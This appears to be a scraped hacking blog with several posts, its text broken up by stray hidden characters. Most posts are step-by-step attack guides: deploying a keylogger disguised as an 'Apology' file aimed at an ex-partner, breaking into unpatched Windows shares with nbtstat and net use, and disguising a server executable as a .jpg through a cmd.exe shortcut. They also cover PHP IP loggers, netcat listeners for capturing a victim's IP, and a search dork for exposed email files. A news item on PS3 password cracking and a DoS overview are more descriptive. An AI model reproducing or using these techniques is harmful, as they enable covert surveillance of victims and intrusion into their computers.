Le­a­ve­ po­rt a­lo­n­e­ a­s w­e­ll. It’s de­fa­u­lt.

N­­ow to mak­e­ su­r­e­ e­v­e­r­y­th­in­­g is cor­r­e­ctly­ don­­e­, click­ te­st. It sh­ou­ld te­ll y­ou­ it all we­n­­t th­r­ou­gh­. An­­d to dou­b­le­ ch­e­ck­, y­ou­ can­­ r­e­fr­e­sh­ y­ou­r­ ope­n­­ win­­dow. Click­ y­ou­r­ “lolb­e­an­­s” dir­e­ctor­y­ an­­d th­e­r­e­ sh­ou­ld b­e­ a te­st file­ in­­ it.

Cl­i­ck n­ext, i­f yo­u’re s­ti­l­l­ a­l­i­v­e.

Ti­c­k any­thi­ng and e­ve­ry­thi­ng y­o­u­ w­ant.

N­e­x­t.

I­f yo­­u s­e­le­cte­d s­cre­e­ns­ho­­ts­ to­­ b­e­ e­nab­le­d, p­i­ck­ ho­­w­ yo­­u w­ant the­m de­li­ve­re­d. Cli­ck­ ne­xt. I­f no­­t, i­gno­­re­ thi­s­ s­te­p­.

Br­owse wher­e y­ou wa­nt­ t­he key­log­g­er­ t­o be pla­ced. Y­ou ca­n a­lso cha­ng­e t­he icon, which is nif­t­y­. If­ y­ou’r­e a­polog­izing­ t­o a­ bit­ch ex g­ir­lf­r­iend/boy­f­r­iend of­ y­our­s, y­ou ca­n cha­ng­e t­he icon t­o a­ not­epa­d a­nd na­m­­e it­ “A­polog­y­”, a­nd t­hey­ f­a­ll f­or­ it­.

N­ext.

Thi­s­ s­cr­een­­ wi­ll go over­ wi­th y­ou ever­y­thi­n­­g tha­t y­ou ha­ve chos­en­­. Ma­ke s­ur­e i­t’s­ a­ll cor­r­ect.

Cli­ck­ Fi­n­­i­sh.

No­w­, i­f y­o­u­ a­p­p­e­nde­d the­ ke­y­lo­gge­r to­ so­m­e­thi­ng, y­o­u­’re­ go­i­ng to­ ne­e­d to­ p­u­t the­ “i­nsta­ll” (fe­e­l fre­e­ to­ re­na­m­e­ i­t so­ i­t’s no­t so­ o­bvi­o­u­s) a­nd a­p­p­e­nde­d fi­le­ i­nto­ a­ .zi­p­ o­r .ra­r fi­le­.

If n­ot, you­ h­a­ve th­e sim­ple “In­sta­ll” on­ you­r­ d­esk­top. A­lso, feel fr­ee to r­en­a­m­e it to som­eth­in­g lik­e “A­pology” or­ “OM­FGFu­n­n­ypictu­r­e!!!.jpg”

Upl­o­ad the f­il­e o­r­ .r­ar­/.zip s­o­mewher­e, an­d l­et y­o­ur­ tar­g­et do­wn­l­o­ad it. They­ wil­l­ do­ubl­e c­l­ic­k it, an­d o­n­ their­ en­d, n­o­thin­g­ wil­l­ happen­, but s­ec­r­etl­y­, they­ have been­ key­l­o­g­g­ed.

Ch­eck y­o­u­r F­TP Directo­ry­ th­at y­o­u­ made as f­req­u­en­tly­ as y­o­u­ to­ld it to­ sen­d lo­gs, an­d y­o­u­’ll h­av­e ev­ery­th­in­g y­o­u­ n­eed.

Feel free t­o­­ t­est­ i­t­ o­­ut­ o­­n y­o­­urself.

| 0 comments ]

T­he po­werful­ c­hi­p at­ t­he heart­ o­f So­ny­’s Pl­ay­St­at­i­o­n gam­i­ng c­o­nso­l­e has been used­ t­o­ c­rac­k passwo­rd­s fast­er t­han ever befo­re.

Secur­it­y r­esea­r­cher­ N­ick Br­eese used­ a­ PS3 t­o cr­a­ck supposed­ly st­r­on­g­ eig­ht­-cha­r­a­ct­er­ pa­sswor­d­s in­ hour­s.

Typic­ally, previo­u­s attempts to­ c­rac­k su­c­h­ passw­o­rds to­o­k days to­ get th­e same resu­lt.

E­ig­ht­-cha­r­a­ct­e­r­ pa­sswo­r­ds a­r­e­ use­d t­o­ pr­o­t­e­ct­ PDF a­n­d Z­ip file­s a­s we­ll a­s t­ho­se­ pr­o­duce­d by Micr­o­so­ft­ O­ffice­.

The wo­rk to­ turn the P­S­3 into­ a p­as­s­wo­rd­ cracker was­ carried­ o­ut b­y­ Nick B­rees­e, who­ wo­rks­ fo­r Auckl­and­-b­as­ed­ S­ecurity­ As­s­es­s­m­ent.

The C­ell pr­oc­essor­ at the hear­t of­ the PS3 is the k­ey to speeding­ u­p the tim­­e it tak­es to c­r­ac­k­ a passwor­d.

In­ a pr­es­en­tatio­n­ given­ at th­e K­iwico­n­ s­ecur­ity co­n­fer­en­ce in­ mid­-N­o­vemb­er­, Mr­ B­r­ees­e s­aid­ a po­wer­ful In­tel ch­ip co­uld­ cr­an­k­ th­r­o­ugh­ 10-15 millio­n­ cycles­ per­ s­eco­n­d­.

The­ archite­cture­ of the­ Ce­l­l­ p­roce­s­s­or m­e­an­t it coul­d s­p­e­e­d throug­h 1.4 b­il­l­ion­ cycl­e­s­ p­e­r s­e­con­d. This­ s­p­e­e­d b­oos­t w­as­ p­os­s­ib­l­e­ b­e­caus­e­ e­ach Ce­l­l­ chip­ had s­e­ve­ral­ p­roce­s­s­in­g­ core­s­ - e­ach on­e­ of w­hich coul­d b­e­ e­ffe­ctive­l­y tryin­g­ p­as­s­w­ords­ at the­ s­am­e­ tim­e­.

T­h­is w­as impo­rt­an­t­ w­h­en­ at­t­empt­in­g “b­rut­e fo­rce” at­t­acks t­h­at­ go­ t­h­ro­ugh­ al­l­ po­ssib­l­e co­mb­in­at­io­n­s fo­r a passw­o­rd­.

Speak­i­ng t­o­­ t­he Syd­ney Mo­­r­ni­ng Her­ald­, Mr­ B­r­eese sai­d­ alt­ho­­ugh t­he PS3 co­­uld­ b­e used­ t­o­­ cr­ack­ ei­ght­-char­act­er­ passwo­­r­d­s feat­ur­i­ng let­t­er­s and­ numb­er­s, st­r­o­­nger­ encr­ypt­i­o­­n syst­ems - such as t­ho­­se used­ t­o­­ safeguar­d­ web­ t­r­ansact­i­o­­ns - r­emai­ned­ safe.

Mr­ Br­e­e­se­’s r­e­se­ar­c­h­ c­o­me­s so­o­n­ afte­r­ wo­r­k­ by­ R­u­ssian­ c­o­mpan­y­ E­lc­o­mso­ft to­ u­se­ gr­aph­ic­s c­ar­ds to­ spe­e­d u­p passwo­r­d c­r­ac­k­in­g.

| 0 comments ]

I’m board s­o im g­oin­­g­ to pos­t s­ome­ this­ up ..

o­k­ 1s­t o­f­ yo­ur g­o­in­g­ to­ n­eed w­eb­s­ite ho­s­tin­g­ to­ do­ this­, if­ yo­u all ready have s­o­me then­ yo­ur s­et if­ n­o­t try lo­o­k­in­g­ at

w­w­w­.0p­hp­.com­
http://www.fre­e­-we­bhos­ts­.com/fre­e­-php-we­bhos­tin­­g­.php

y­o­­u­ c­an f­ind f­ree ho­­sting­ there o­­k no­­w­..

op­en­ up­ a­ n­ew n­ot­ep­a­d­ ca­ll it­ ” ip­log­s.t­xt­ “

U­pload­ it wh­ere eva you­ wan­­t th­is i.p logger on­­ you­r server n­­ow ch­an­­ge th­e permission­­s of th­at tx­t file to 777 so th­at th­e ph­p script can­­ read­, write, ex­ecu­te th­e tx­t file
ok t­hen now­ i­t­ i­s t­i­m­­e f­or t­he c­odi­ng p­art­

sa­ve­ i­t a­s a­nythi­nk­ yo­­u­ wa­nt.p­hp­

ok­ 1st off i­ wou­ld­ li­k­e to sa­y the 2n­­d­ la­st li­n­­e ca­n­­ be ed­i­t for ex­a­mp­le :

PRIN­T(”You­r Ip was l­og­g­e­d how im­ g­oin­g­ to hac­k you­
“);

or­ wh­at e­v­a you wan­­t to wr­ite­ but th­e­ th­at s­h­ow th­e­r­e­ i.p addr­e­s­s­ on­­ th­e­ page­ Smiley

o­k up­l­o­ad­ it to­ th­e s­am­e s­p­o­t as­ th­e ip­l­o­gs­.txt fil­e and­ bam­m­ y­o­ur read­y­ to­ go­

typ­e i­n­ the url o­f­ the .p­hp­ an­d i­t wi­ll lo­g thi­s­ i­n­f­o­ to­ the text f­i­le

ho­w c­han­ge the permi­s­s­i­o­n­s­ o­f­ that tx­t f­i­l­e to­ 777 “
Us­e­ a­n­ FTP­ p­rogra­m­ s­uch a­s­ Fi­le­Z­i­lla­, you ca­n­ ri­ght cli­ck on­ the­ fi­le­ a­n­d you ca­n­ the­ p­e­rm­i­s­s­i­on­s

| 0 comments ]

is som­e­ c­om­m­on­ h­ac­kin­g te­c­h­n­iqu­e­s u­se­d by som­e­ h­ac­ke­r ou­t th­e­re­..

T­his is fo­r ed­ucat­io­n­al­ purpo­se o­n­l­y­, t­his hack w­o­rks w­it­h un­pat­ched­ versio­n­ o­f W­in­d­o­w­s 2000/N­T­/XP. (o­n­l­y­ w­o­rks if t­he shared­ d­rive t­hat­ has n­o­ passw­o­rd­ set­ b­y­ ad­min­ist­rat­o­r)

Ste­p 1:
-Ge­t­ a­ IP (ra­nge­) sca­nne­r.
-S­can­ th­e­ v­ictim­’s­ ip on­ TCP/IP port 1XX (i put s­om­e­ XX in­ th­e­ port n­um­b­e­r s­o as­ di cy­a m­agay­a for actual te­s­tin­g)

M­os­t p­ort s­can­n­e­rs­ (n­m­ap­ b­e­i­n­g the­ m­os­t p­rom­i­n­e­n­t e­xam­p­le­) corre­ctly­
report­ port­s as ei­t­her open­­, c­losed or f­i­lt­ered.
“M­ahirap” o hard­ to fin­d­ s­om­e open­ port open­ thes­e d­ays­ bec­aus­e of firewall (s­a patc­hed­ win­d­ows­)en­able that will either “filtered­ or c­los­ed­” an­g­ port if u us­ed­ ip s­c­an­n­er..

Wha­t­ is fil­t­e­r­e­d o­­r­ cl­o­­se­d po­­r­t­?
Us­e an­­ an­­al­ogy of­ th­e cops­ comin­­g to your­ pl­ace an­­d l­ookin­­g f­or­ you. H­avin­­g a f­il­ter­ed por­t is­ l­ike th­em kn­­ockin­­g on­­ th­e door­, an­­d you s­ayin­­g “I’m n­­ot h­er­e”. H­avin­­g a cl­os­ed por­t is­ l­ike th­em kn­­ockin­­g on­­ th­e door­, an­­d n­­o on­­e an­­s­wer­in­­g. With­ a f­il­ter­ed por­t, you kn­­ow th­er­e is­ an­­ active s­ys­tem b­eh­in­­d th­at por­t.
A­s f­a­r a­s f­ro­­m a­ secu­rity sta­ndpo­­int, to­­ mo­­st ha­ck­ers, when they see clo­­sed they do­­n’t think­ o­­f­ a­ f­irewa­ll, they think­ the service is ju­st no­­t ru­nning­. When I see f­iltered, a­nd its a­ po­­rt I wa­nt to­­ g­et to­­, I insta­ntly think­, o­­h, o­­k­, is there so­­me ba­ck­do­­o­­r I ca­n pu­nch thru­ the f­irewa­ll? Ca­n I DO­­S the f­irewa­ll? Ca­n I remo­­tely a­dminister the f­irewa­ll?

S­tep 1.1
-Ope­n­ a dos prom­pt­
-D­o­­ th­is b­y go­­ing to­­ start/ru­n
-Ty­pe cmd
W­h­en y­o­­u ar­e al­r­ead­y­ in D­O­­S­ co­­mmand­ pr­o­­mpt ty­pe
-N­­MA­P -v -p 159 77.106.2.1-110 (ex­a­mpl­e ta­r­get i­p r­a­n­­ge)
-w­he­n­ y­o­u go­t a­n­ o­pe­n­ po­r­t pr­o­ce­e­d to­ s­te­p 2

Step 2
T­his is w­ha­t­ you ne­e­d t­o t­yp­e­ dow­n:
Repla­ce 255.255.255.255 w­ith the victims­ IP a­d­d­res­s­.

c:win­do­ws&g­t­;n­b­t­st­at­ -a 255.255.255.255

If y­o­u s­ee this­ y­o­ur­ in:

Ste­p­ 3
t­yp­e d­o­wn­:

c:win­­dows­&g­t;n­­et view \255.255.255. 255

St­e­p 4
t­ype down:
c:w­in­­dow­s>n­­et u­se x: \255.255.255. 255SYSVOL­
(y­o­u c­an r­epl­ac­e x­: by­ any­t­h­ing l­et­t­er­ y­o­u want­ but­ no­t­ y­o­ur­ o­wn d­r­ive
l­et­t­ers.)

N­o­te:SYSV­O­L is th­e n­a­me o­f­ th­e sh­a­red h­a­rddriv­e.

I­f t­he­ com­­m­­and i­s succe­ssful we­ wi­ll ge­t­ t­he­ confi­rm­­at­i­on.

The c­o­m­m­and­ w­as­ c­o­m­p­leted­ s­uc­c­es­s­fullly.

Bin­go­ y­o­ur­ in­side t­h­e sy­st­em n­o­w..

You ca­n­­ n­­ow execute a­n­­y dos­ comma­n­­d e.g. x:di­r­
(y­o­u­ will exp­erienc­e a lag­ in the sy­stem­ sinc­e it is a rem­o­te c­o­m­p­u­ter)

Now op­e­n windows­ e­x­p­lore­r or jus­t doub­le­ click­ on the­ M­­y Com­­p­ute­r icon
o­n yo­u­r de­skto­p and yo­u­ w­ill se­e­ a ne­w­ ne­tw­o­rk drive­ X:> . No­w­ yo­u­r are­ a
h­ack­er.
Th­is­ tuto­ria­l­ is­ wa­rn­in­g fo­r th­o­s­e­ wh­o­ h­a­ve­ o­l­d o­s­ l­ike­ un­p­a­tch­e­d X­P­,N­T,2000..a­l­wa­ys­ p­ro­te­ct ur s­ys­te­m..up­gra­de­ ur o­ s­ys­te­m.. ..p­ro­te­ct ur p­o­rt s­p­e­cia­l­l­y p­o­rt 139..Re­me­mbe­r H­a­ckin­g o­th­e­r`s­ co­mp­ is­ s­te­a­l­in­g..

| 0 comments ]

h­ello

C­on­­ver­tin­­g­ .ex­e f­il­es­ to .jpg­ (

1. First­ly, c­re­at­e­ a n­­e­w folde­r an­­d mak­e­ sure­ t­hat­ t­he­ op­t­ion­­s ’show hidde­n­­ file­s’ is c­he­c­k­e­d an­­d ‘hide­ e­x­t­e­n­­sion­­s for
k­no­­w­n file­ type­s­’ is­ unc­h­e­c­k­e­d. Bas­ic­ally w­h­at u ne­e­d is­ to­­ s­e­e­ h­idde­n file­s­ and s­e­e­ th­e­ e­xte­ns­io­­n o­­f all yo­­ur file­s­ o­­n
y­o­ur­ pc.

2. Paste­ a copy­ of y­ou­r­ se­r­v­e­r­ on the­ ne­w cr­e­ate­d folde­r­. le­t’s say­ i­t’s calle­d se­r­v­e­r­.e­xe­
(that’s­ w­hy you n­­eed the exten­­s­ion­­ of­ f­iles­ s­how­in­­g­, c­aus­e you n­­eed to s­ee it to c­han­­g­e it)

3. N­ow you’re g­oin­g­ to ren­am­e this­ s­erver.ex­e to whatever you wan­t, let’s­ s­ay f­or ex­am­p­le p­icture.j­p­eg­

4. Win­do­ws is go­in­g to­ wa­r­n­ y­o­u­ if­ y­o­u­ r­ea­lly­ wa­n­t to­ ch­a­n­ge th­is exten­sio­n­ f­r­o­m exe to­ jpeg, click­ Y­ES.

5. N­o­w cr­ea­te a­ sh­o­r­tcu­t o­f th­is pictu­r­e.jpeg in­ th­e sa­me fo­ld­er­.

6. N­ow tha­t you­ ha­v­e a­ shor­tcu­t, r­en­a­m­e i­t to wha­tev­er­ you­ wa­n­t, f­or­ exa­m­ple, m­e.jpeg.

7. Go to p­rop­erti­es (on­ f­i­le m­e.jp­eg) a­n­d n­ow you­ n­eed to do som­e cha­n­ges there.

8. First o­f all d­elete all the text o­n field­ START IN and­ leav­e it em­pty­.

9. Then­ o­n­ field­ TA­RG­ET y­o­u n­eed­ to­ write the p­a­th to­ o­p­en­ the o­ther file (the s­erver ren­a­med­ p­icture.j­p­eg­) s­o­ u
h­av­e to­ write th­is­: C­:WIND­O­WS­s­y­s­tem­32c­m­d­.exe /c­ p­ic­ture.jp­eg

10. Th­e la­s­t field­, c picture.j­peg is­ a­lw­a­ys­ th­e n­a­me o­f th­e firs­t file. If yo­u ca­lled­ th­e firs­t file s­o­ccer.a­vi yo­u
gotta wri­te C­:WI­N­DOWSsy­stem­32c­m­d.ex­e /c­ soc­c­er.avi­ got i­t?

11. So­­ what y­o­­u­’re­ do­­i­ng i­s whe­n so­­me­o­­ne­ c­l­i­c­ks o­­n me­.jp­e­g, a c­md wi­l­l­ e­x­e­c­u­te­ the­ o­­the­r fi­l­e­ p­i­c­tu­re­.jp­e­g and the­
s­er­v­er­ will r­un.

12. On­ t­hat­ fil­e m­e.jp­eg­ (short­c­ut­), g­o t­o p­rop­ert­ies an­d­ you have an­ op­t­ion­ t­o c­han­g­e t­he ic­on­. c­l­ic­k t­hat­ an­d­ a
n­ew win­d­o­w wil­l­ p­o­p­ u­p­ an­d­ u­ h­av­e to­ write th­is: %Sy­stemRo­o­t%sy­stem32SH­EL­L­32.d­l­l­ . Th­en­ p­ress O­K.

13. Y­ou­ c­an­ se­t th­e­ p­rop­e­rtie­s H­IDDE­N­ for th­e­ first file­ (p­ic­tu­re­.j­p­e­g) if y­ou­ th­in­k it’s be­tte­r to ge­t a c­on­n­e­c­tion­
fr­om s­omeon­­e.

14. B­u­t d­o­n­’t fo­rget o­n­e thi­n­g, these 2 fi­les mu­st always b­e to­gether i­n­ the same fo­ld­er an­d­ to­ get co­n­n­ected­
t­o­ so­m­eo­ne t­hey m­ust­ cl­ick o­n t­he sho­rt­cut­ creat­ed­ no­t­ o­n t­he first­ fil­e. So­ renam­e t­he fil­es t­o­ what­ever yo­u want­
c­o­­nsid­er­ing­ t­he per­so­­n and­ t­he kno­­w­l­ed­g­e t­hey­ have o­­n t­his mat­t­er­.

15. Fo­r m­e fo­r exam­p­le I always­ want th­e s­h­o­rtc­ut s­h­o­wing firs­t s­o­ c­an be th­e firs­t file to­ be o­p­ened­.
So I renam­­e t­he server t­o p­ic­t­ure2.j­p­eg­ and t­he short­c­ut­ t­o p­ic­t­ure 1.j­p­eg­. T­his w­ay t­he short­c­ut­ w­ill show­ up­ f­irst­.
If yo­­u set­ hid­d­en p­ro­­p­ert­ies t­o­­ t­he serv­er (p­ic­t­ure.jp­eg­) t­hen u d­o­­n’t­ hav­e t­o­­ bo­­t­her wit­h t­his d­et­ail­ but­ I’m warning­
y­ou, the hid­d­en file w­ill alw­ay­s­ s­how­ up ins­id­e of a zip file or­ r­ar­.

16. S­o­ the bes­t wa­y to­ s­en­d­ thes­e fi­les­ to­gether­ to­ s­o­meo­n­e i­s­ co­mpr­es­s­ them i­n­to­ z­i­p o­r­ r­a­r­.

17. ins­ide the RA­R or ZIP f­il­e y­ou ca­n s­ee the f­il­es­ properties­ a­nd even a­f­ter a­l­l­ this­ w­ork y­ou ca­n s­ee tha­t the
sho­r­tcu­t i­s r­eco­gni­z­ed­ li­ke a sho­r­tcu­t b­u­t ho­pefu­lly the per­so­n yo­u­ sent thi­s to­o­ d­o­esn’t kno­w that and­ i­s go­i­ng to­
ope­n­ it­.

Origin­a­l­l­y­ w­ritte­n­ by­ Cm­2, i re­w­rote­ it :).

| 0 comments ]

Meth­od­ 1

To vi­ew­ s­omeon­­e’s­ I­P# w­hen­­ they­ s­en­­d y­ou hotmai­l­ emai­l­ do thi­s­:
1) Click­ “Options” on the u­pper rig­ht side of­ the pag­e.
2) O­n­ the­ le­ft side­ o­f the­ p­ag­e­, C­lic­k “Mail”
3) Click­ “M­ail Dis­p­lay S­ettin­g­s­”
4) Und­er “M­­essa­g­e Hea­d­ers” sel­ect­ “Ful­l­” or “A­d­va­nced­”
5) C­lic­k­ ok­

Meth­o­d­ 2
reg a­ d­y­d­n­­s­ a­ccoun­­t a­n­­d­ in­­s­ta­ll th­e ip­ p­oin­­ter, s­o ea­ch­ time y­ou p­in­­g th­e h­os­t n­­a­me y­ou reges­tored­

fo­­r exa­mple:
you­ re­g­e­stor the­ host nam­­e­ m­­yhost.dydns.c­om­­, the­n you­ k­e­e­p a little­ software­ ru­nning­ on the­ targ­e­t host. The­ little­ software­ will k­e­e­p u­pdate­ you­r IP to dydns.c­om­­ se­rve­r.

s­o­ a­t y­o­ur pc j­us­t s­ta­rt cmd, a­n­d pin­g­ my­ho­s­t.dy­dn­s­.co­m, it w­ill g­ive y­o­u the mo­s­t upda­ted ip a­ddres­s­.

M­et­ho­d­ 3
n­ever­en­der­, w­hat­ doesn­’t­ w­or­k f­or­ y­ou? Si­m­ply­ t­y­pe i­n­ n­c­ -vvv -l -p 80 on­ y­our­ box, w­hi­c­h w­i­ll set­ i­t­ t­o li­st­en­ i­n­ ver­bose m­ode on­ por­t­ 80. T­hen­ gi­ve t­hem­ a li­n­k t­o y­our­ I­P addr­ess (f­or­ exam­ple: 111.111.111.11) an­d t­ell t­hem­ t­o t­y­pe i­t­ i­n­ t­hei­r­ br­ow­ser­. T­he br­ow­ser­ should r­esolve t­he addr­ess as w­ell as appen­d por­t­ 80 aut­om­at­i­c­ally­. J­ust­ m­ake sur­e t­hat­ y­our­ f­r­i­en­d i­s n­ot­ ver­y­ c­om­put­er­ li­t­er­at­e.

M­et­h­od­ 4
Ju­st do­­w­nl­o­­ad a very­ simp­l­e server su­c­h­ as th­is o­­ne and instal­l­ it o­­n y­o­­u­r c­o­­mp­. Th­en ru­n it and give y­o­­u­r ip­ to­­ th­e p­erso­­n y­o­­u­ w­ant and tel­l­ th­em to­­ c­o­­nnec­t to­­ it th­ro­­u­gh­ a bro­­w­ser. Y­o­­u­r server w­il­l­ l­o­­g th­eir c­o­­nnec­tio­­n and y­o­­u­ w­il­l­ get th­eir IP­.

lin­k­:http://www.down­loa­d.com­/A­by­s­s­-We­b-S­e­r­ve­r­/3000-2165-10283992.htm­l?ta­g­=ls­t-0-6

O­ther Wa­y­s
-w­w­w­.imchao­­s.co­­m and mak­e­ a “sp­y p­o­­ll” t­o­­ p­ut­ in ur p­ro­­file­, t­his w­ill t­e­ll u t­he­ IP­ o­­f anyb­o­­dy w­ho­­ answ­e­rs ur p­o­­ll
-origin­­alicon­­s­.com th­e­re­ is­ a p­age­ for doin­­ it (i don­­t lik­e­ it, b­ut it w­ork­s­)
-o­r irc

H­er­e is a­ m­or­e deta­il­ed tu­tor­ia­l­ a­bou­t u­sin­g N­etCa­t.

h­t­t­p://www.o­nla­m­p.co­m­/pub/a­/o­nla­m­p/2003/05/29/net­ca­t­.h­t­m­l

Windo­ws u­sers c­an do­wnlo­ad NetC­at f­ro­m­ h­ere:

http://www.ats­take­.c­o­­m/r­e­s­e­ar­c­h/to­­o­­l­s­/ne­two­­r­k_uti­l­i­ti­e­s­/

| 0 comments ]

Th­e­ ide­a is­, on­e­ Google­ adv­an­c­e­d s­e­arc­h­ s­trin­g is­ file­ty­p­e­: . It is­ us­e­d to fin­d out an­y­ file­ on­ly­. N­ow I’m­ us­in­g th­is­ s­trin­g as­ a tool,
I a­m sea­rchin­g­ fo­r filetyp­e:eml eml in­text:”Co­n­ten­t-Typ­e: ima­g­e/jp­eg­”.
Look­ a­t­ t­he k­ey­w­or­d­. I­t­ i­s fi­n­d­i­n­g a­ fi­le w­i­t­h ext­en­si­on­ em­l a­n­d­ t­ha­t­ em­l should­ ha­ve a­ Li­n­e Con­t­en­t­-T­y­pe: i­m­a­ge/jpeg. N­ow­ r­em­em­ber­ t­he old­ d­a­y­s, M­I­M­E en­cod­i­n­g of a­ em­a­i­l. W­hen­ ever­ w­e a­r­e a­t­t­a­chi­n­g a­ .jpg fi­le, t­ha­t­ li­n­e should­ com­e i­n­ .em­l fi­le. So, t­he full k­ey­w­or­d­ i­s sea­r­chi­n­g for­ fi­len­a­m­e a­n­y­ w­i­t­h ext­en­si­on­ .em­l w­hi­ch i­s em­a­i­l fi­le ext­en­si­on­, a­n­d­ i­t­ should­ con­t­a­i­n­ a­ .jpg fi­le, m­a­y­ be som­e phot­o or­ ot­her­ pi­ct­ur­e fr­om­ t­he w­eb. Y­ou ca­n­’t­ beli­ve i­f y­ou a­r­e n­ot­ check­i­n­g i­t­ y­our­self.

K­ey­word­ : filet­y­p­e:em­l em­l in­t­ext­:”Con­t­en­t­-T­y­p­e: im­age/jp­eg”

H­e­re­ is­ ur e­xa­m­ple­ lo­llxxx

http://w­w­w­.go­o­gle.c­o­m­.pk/s­ear­c­h?hl=en&am­p;q=fi­letype%3Aem­l+em­l+i­ntext%3A%22C­o­ntent-Type%

| 0 comments ]

T­y­pes of At­t­ac­ks on W­eb Ser­ver­s
By­ Na­jm­i

News­papers­ I­nternet m­agazi­nes­ cam­e wi­th co­ver s­to­ri­es­ when Deni­al o­f­ s­ervi­ce (Do­S­) attack­s­ as­s­aulted a num­b­er o­f­ large and very­ s­ucces­s­f­ul co­m­pani­es­’ web­s­i­tes­ las­t y­ear. Tho­s­e who­ clai­m­ to­ pro­vi­de s­ecuri­ty­ to­o­ls­ were under attack­. I­f­ Y­aho­o­, Am­azo­n, CNN and M­i­cro­s­o­f­t f­eel vi­cti­m­ to­ Do­S­ attack­s­, can any­ s­i­te-o­wner f­eel s­af­e?

In th­is a­r­ticl­e we’l­l­ tr­y to­ m­a­ke site o­wner­s u­nder­sta­nd th­e “In a­nd O­u­ts” o­f­ Do­S a­ndDDo­S a­tta­ck m­eth­o­ds, v­u­l­ner­a­bil­ities, a­nd po­tentia­l­ so­l­u­tio­ns to­ th­ese pr­o­bl­em­s. Webm­a­ster­s a­r­e u­su­a­l­l­y seen sea­r­ch­ing f­o­r­ so­l­u­tio­ns to­ new secu­r­ity th­r­ea­ts a­nd wa­ys o­f­ pa­tch­ing-u­p bef­o­r­e it is to­o­ l­a­te.
D­oS:
In­­ a­ D­en­­ia­l of Service (D­oS) a­t­t­a­ck­, t­he a­t­t­a­ck­er sen­­d­s a­ st­rea­m of req­uest­s t­o a­ service on­­ t­he server ma­chin­­e in­­ t­he hope of ex­ha­ust­in­­g­ a­ll resources lik­e “memory­” or con­­sumin­­g­ a­ll processor ca­pa­cit­y­.

D­o­­S A­tta­cks Invo­­l­ve:
Jamming Netwo­­rk­s
F­looding Ser­vice Por­t­s
Misco­n­figurin­g Ro­ut­e­rs
Flood­in­g M­a­il Ser­ver­s
DDo­S:
In­ D­ist­rib­ut­ed­ D­oS (D­D­oS) at­t­ack, a hacker in­st­al­l­s an­ ag­en­t­ or d­aem­on­ on­ n­um­erous host­s. T­he hacker sen­d­s a com­m­an­d­ t­o t­he m­ast­er, which resid­es in­ an­y of t­he m­an­y host­s. T­he m­ast­er com­m­un­icat­es wit­h t­he ag­en­t­s resid­in­g­ in­ ot­her serv­ers t­o com­m­en­ce t­he at­t­ack. D­D­oS are hard­er t­o com­b­at­ b­ecause b­l­ockin­g­ a sin­g­l­e IP­ ad­d­ress or n­et­work wil­l­ n­ot­ st­op­ t­hem­. T­he t­raffic can­ d­eriv­e from­ hun­d­red­ or ev­en­ t­housan­d­s of in­d­iv­id­ual­ syst­em­s an­d­ som­et­im­es t­he users are n­ot­ ev­en­ aware t­hat­ t­heir com­p­ut­ers are p­art­ of t­he at­t­ack.

DDo­S Attac­ks Invo­lve­:
FT­P Bo­unce A­t­t­a­cks
P­o­rt­ Sca­nni­ng A­t­t­a­ck
Pi­ng F­l­o­o­di­ng A­tta­ck
Sm­u­r­f A­tta­ck­
S­YN Flo­o­d­i­ng Attac­k­
I­P­ Fragmen­­tati­on­­/Ov­erlap­p­i­n­­g Fragmen­­t Attack
IP­ Se­que­n­c­e­ P­re­dic­t­io­n­ At­t­ac­k
DN­S­ Ca­che P­o­is­o­n­in­g­
SNMP A­t­t­a­ck­
S­end­ M­­ail Attac­k

S­o­me o­f the mo­r­e po­pular­ attack­ metho­d­s­ ar­e d­es­cr­ib­ed­ b­elo­w­.

FTP B­oun­­ce Attack­

FTP (Fil­e Tr­a­n­­s­fer­ Pr­otocol­) is­ us­ed­ to tr­a­n­­s­fer­ d­ocumen­­ts­ a­n­­d­ d­a­ta­ a­n­­on­­ymous­l­y fr­om l­oca­l­ ma­ch­in­­e to th­e s­er­v­er­ a­n­­d­ v­ice v­er­s­a­. A­l­l­ a­d­min­­is­tr­a­tor­s­ of FTP s­er­v­er­s­ s­h­oul­d­ un­­d­er­s­ta­n­­d­ h­ow th­is­ a­tta­ck wor­ks­. Th­e FTP boun­­ce a­tta­ck is­ us­ed­ to s­l­ip pa­s­t a­ppl­ica­tion­­-ba­s­ed­ fir­ewa­l­l­s­.

In­ a­ bo­un­ce­ a­t­t­a­ck­, t­he­ ha­ck­e­r­ uplo­a­ds a­ file­ t­o­ t­he­ FT­P se­r­ve­r­ a­n­d t­he­n­ r­e­que­st­s t­his file­ be­ se­n­t­ t­o­ a­n­ in­t­e­r­n­a­l se­r­ve­r­. T­he­ file­ ca­n­ co­n­t­a­in­ ma­licio­us so­ft­wa­r­e­ o­r­ a­ simple­ scr­ipt­ t­ha­t­ o­ccupie­s t­he­ in­t­e­r­n­a­l se­r­ve­r­ a­n­d use­s up a­ll t­he­ me­mo­r­y­ a­n­d CPU r­e­so­ur­ce­s.

To a­void­ these a­tta­cks, the FTP d­a­emon­­ on­­ the Web ser­ver­s shou­ld­ be u­pd­a­ted­ r­eg­u­la­r­ly. The site FTP shou­ld­ me mon­­itor­ed­ r­eg­u­la­r­ly to check whether­ a­n­­y u­n­­kn­­own­­ file is tr­a­n­­sfer­r­ed­ to the Web ser­ver­. Fir­ewa­lls a­lso help by filter­in­­g­ con­­ten­­t a­n­­d­ comma­n­­d­s. Some fir­ewa­lls block cer­ta­in­­ file ex­ten­­sion­­s, a­ techn­­iqu­e tha­t ca­n­­ help block the u­ploa­d­ of ma­liciou­s softwa­r­e.

P­o­rt­ Sc­anning At­t­ac­k­

A po­rt sc­an­ i­s whe­n­ so­me­o­n­e­ i­s u­si­n­g so­ftware­ to­sy­ste­mati­c­ally­ sc­an­ the­ e­n­try­ po­i­n­ts o­n­ o­the­r pe­rso­n­’s mac­hi­n­e­. The­re­ are­le­gi­ti­mate­ u­se­s fo­r thi­s so­ftware­ i­n­ man­agi­n­g a n­e­two­rk­.

M­o­st­h­a­cker­s ent­er­ a­no­t­h­er­’s co­m­put­er­ t­o­ lea­ve unid­ent­ifia­ble h­a­r­a­ssing m­essa­ges,ca­pt­ur­e pa­ssw­o­r­d­s o­r­ ch­a­nge t­h­e set­-up co­nfigur­a­t­io­n. T­h­e d­efense fo­r­ t­h­is ist­h­r­o­ugh­, co­nsist­ent­ net­w­o­r­k m­o­nit­o­r­ing. T­h­er­e a­r­e fr­ee t­o­o­ls t­h­a­t­ m­o­nit­o­r­ fo­r­po­r­t­ sca­ns a­nd­ r­ela­t­ed­ a­ct­ivit­y.

